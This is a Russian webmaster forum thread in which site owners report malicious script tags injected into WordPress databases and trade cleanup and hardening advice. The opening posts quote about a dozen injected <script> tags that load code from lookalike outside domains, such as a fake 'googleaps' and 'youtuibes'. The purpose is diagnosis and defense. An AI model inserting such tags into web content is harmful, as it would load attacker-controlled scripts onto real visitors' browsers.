- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Также обнаружил в БД на сайтах. Все сайты на хосте WP были засраны.
(случайно пост редактировал и обнаружил).
<script src="//wollses.com/steps.png"></script>
<script src="//wollses.com/steps"></script>
<script src="//uptoliked.ru/widjets.js"></script>
<script src="//youtuibes.com/watch"></script>
<script src="//pngme.ru/seter"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>
<script src="//shareup.ru/social.js"></script>
<script type="text/javascript" src="//wq4.ru/js.js"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
Запросами почистил, посмотрю через несколько дней.
Также обнаружил в БД на сайтах. Все сайты на хосте WP были засраны.
(случайно пост редактировал и обнаружил).
<script src="//wollses.com/steps.png"></script>
<script src="//wollses.com/steps"></script>
<script src="//uptoliked.ru/widjets.js"></script>
<script src="//youtuibes.com/watch"></script>
<script src="//pngme.ru/seter"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>
<script src="//shareup.ru/social.js"></script>
<script type="text/javascript" src="//wq4.ru/js.js"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
Запросами почистил, посмотрю через несколько дней.
Такая чистка не помогает.
Удалил код с записей, затем скачал базу и просканировал на наличие того же кода. Оказалось, что в базе он сидит. Удалил его с базы. Посмотрим, что будет дальше.
Кто посоветует рабочее решение? может подскажите ссылку где описано решение.
Заранее спасибо!
Кто посоветует рабочее решение?
Решение чего?
Кто посоветует рабочее решение? может подскажите ссылку где описано решение.
Заранее спасибо!
Рабочее решение - закрывать все дыры на сайте. От того, что удалили сам код из записей - дыры от этого не закрылись, и уже завтра, послезавтра, может через неделю через них вам снова закинут эти строки в посты.
Решение чего?
Спасибо что откликнулись.
Уточню, интересуют 2 момента:
1. через какую дыру в вордпресс этот код вставляют? если уже кто разобрался!
2. как кроме обновления до последней версии, уберечь сайт после чистки? если можно то пожалуйста по шагам напишите, думаю будет полезно очень многим пользователям и тому кто подробно напишет будет огромный + в карму от всех кому он помог.
Заранее спасибо!
---------- Добавлено 09.11.2015 в 19:25 ----------
двакарандашавнос, аналогично вопросы выше, закрывать дыры это общий совет который никакой пользы не несет, если знаете какие дыры закрывать нужно как минимум, пишите тут.
Спасибо что откликнулись.
Уточню, интересуют 2 момента:
1. через какую дыру в вордпресс этот код вставляют? если уже кто разобрался!
2. как кроме обновления до последней версии, уберечь сайт после чистки? если можно то пожалуйста по шагам напишите, думаю будет полезно очень многим пользователям и тому кто подробно напишет будет огромный + в карму от всех кому он помог.
Заранее спасибо!
1. необходимо проводить аудит, исходя из предоставленной вами информации невозможно делать какие либо выводы.
2. чистка это не решение проблемы. нужно обязательно определить источник, по шагам написать невозможно т.к ситуации бывают разные.
без тех. навыков вы не сможете решить проблему, дешевле обратиться к специалистам.
через какую дыру в вордпресс этот код вставляют?
Ну раз речь о ВП я просто дам ссылку на недавний топик.
:)
двакарандашавнос, аналогично вопросы выше, закрывать дыры это общий совет который никакой пользы не несет, если знаете какие дыры закрывать нужно как минимум, пишите тут.
Да там тьма-тьмущая пунктов, что надо сделать на сайте, чтобы закрыть дыры:
менять id администратора, префик таблицы БД, менять папку с wp-content на другую, запрещать загрузку любых файлов кроме изображений, менять адрес входа в админку, ставить защиту от брутфорса, ставить уведомления об изменениях в php файлах, ставить права 444 на критичные файлы, смотреть какие плагины устаревшие, в некоторых есть хорошо известные всем уязвимости, но плагины уже не обновляются и не поддерживаются и т.д. и т.п. Пунктов под 40, что требуется сделать для закрытия дыр. Смотреть логи, когда были изменены какие файлы, каким образом это было сделано.
Если есть опыт в Линеусе, лучше всего установить OC Kali Linux - на неё поставить WPScan и проверить свой сайт на всевозможные уязвимости.